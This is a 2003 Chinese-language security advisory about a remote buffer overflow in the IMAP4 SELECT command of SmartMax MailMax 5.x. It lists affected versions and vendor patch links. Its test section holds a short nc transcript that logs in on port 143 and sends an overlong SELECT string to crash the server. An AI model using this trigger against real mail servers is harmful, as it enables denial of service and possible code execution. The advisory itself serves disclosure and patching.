首页 -> 安全研究
安全研究
安全漏洞
SmartMax MailMax SELECT命令远程缓冲区溢出漏洞
发布日期:2003-04-11
更新日期:2003-04-17
受影响系统:
SmartMax Software MailMax 5.5描述:
SmartMax Software MailMax 5.0.10.8
SmartMax Software MailMax 5.0.10.7
SmartMax Software MailMax 5.0.10.6
SmartMax Software MailMax 5.0
BUGTRAQ ID: 7327
MailMax是一款支持SMTP,IMAP4和POP3协议的EMAIL服务程序,它的TCP/IP GUI允许服务器管理员从Internet连接服务器。
MailMax在处理IMAP4协议时存在缓冲区溢出,远程攻击者可以利用这个漏洞对EMAIL服务程序进行拒绝服务攻击,可能以邮件服务进程权限在系统上执行任意指令。
问题存在与对SELECT命令缺少正确的边界缓冲区检查,攻击者连接143端口,发送包含超长字符串的SELECT命令,就会导致发生缓冲区溢出,停止所有请求,精心构建提交数据可能以邮件服务进程权限在系统上执行任意指令。
<*来源:Mark Litchfield (mark@ngssoftware.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------
建议:
厂商补丁:
SmartMax Software
-----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
升级程序:
SmartMax Software MailMax 5.0.10.8:
SmartMax Software Upgrade mailmax55.exe
http://smartmax.com/download/pub/MailMax5/mailmax55.exe
SmartMax Software Upgrade mailmax5to55msde.exe
http://smartmax.com/download/pub/MailMax5/mailmax5to55msde.exe
MailMax 5.0 to 5.5 upgrade for users with MSDE 2000 SQL Server.
SmartMax Software Upgrade mailmax5to55SQL.exe
http://smartmax.com/download/pub/MailMax5/mailmax5to55SQL.exe
MailMax 5.0 to 5.5 upgrade for users with SQL Server.
SmartMax Software MailMax 5.0.10.7:
SmartMax Software Upgrade mailmax55.exe
http://smartmax.com/download/pub/MailMax5/mailmax55.exe
SmartMax Software Upgrade mailmax5to55msde.exe
http://smartmax.com/download/pub/MailMax5/mailmax5to55msde.exe
MailMax 5.0 to 5.5 upgrade for users with MSDE 2000 SQL Server.
SmartMax Software Upgrade mailmax5to55SQL.exe
http://smartmax.com/download/pub/MailMax5/mailmax5to55SQL.exe
MailMax 5.0 to 5.5 upgrade for users with SQL Server.
SmartMax Software MailMax 5.0.10.6:
SmartMax Software Upgrade mailmax55.exe
http://smartmax.com/download/pub/MailMax5/mailmax55.exe
SmartMax Software Upgrade mailmax5to55msde.exe
http://smartmax.com/download/pub/MailMax5/mailmax5to55msde.exe
MailMax 5.0 to 5.5 upgrade for users with MSDE 2000 SQL Server.
SmartMax Software Upgrade mailmax5to55SQL.exe
http://smartmax.com/download/pub/MailMax5/mailmax5to55SQL.exe
MailMax 5.0 to 5.5 upgrade for users with SQL Server.
SmartMax Software MailMax 5.0:
SmartMax Software Upgrade mailmax55.exe
http://smartmax.com/download/pub/MailMax5/mailmax55.exe
SmartMax Software Upgrade mailmax5to55msde.exe
http://smartmax.com/download/pub/MailMax5/mailmax5to55msde.exe
MailMax 5.0 to 5.5 upgrade for users with MSDE 2000 SQL Server.
SmartMax Software Upgrade mailmax5to55SQL.exe
http://smartmax.com/download/pub/MailMax5/mailmax5to55SQL.exe
MailMax 5.0 to 5.5 upgrade for users with SQL Server.
浏览次数:2748
严重程度:0(网友投票)
绿盟科技给您安全的保障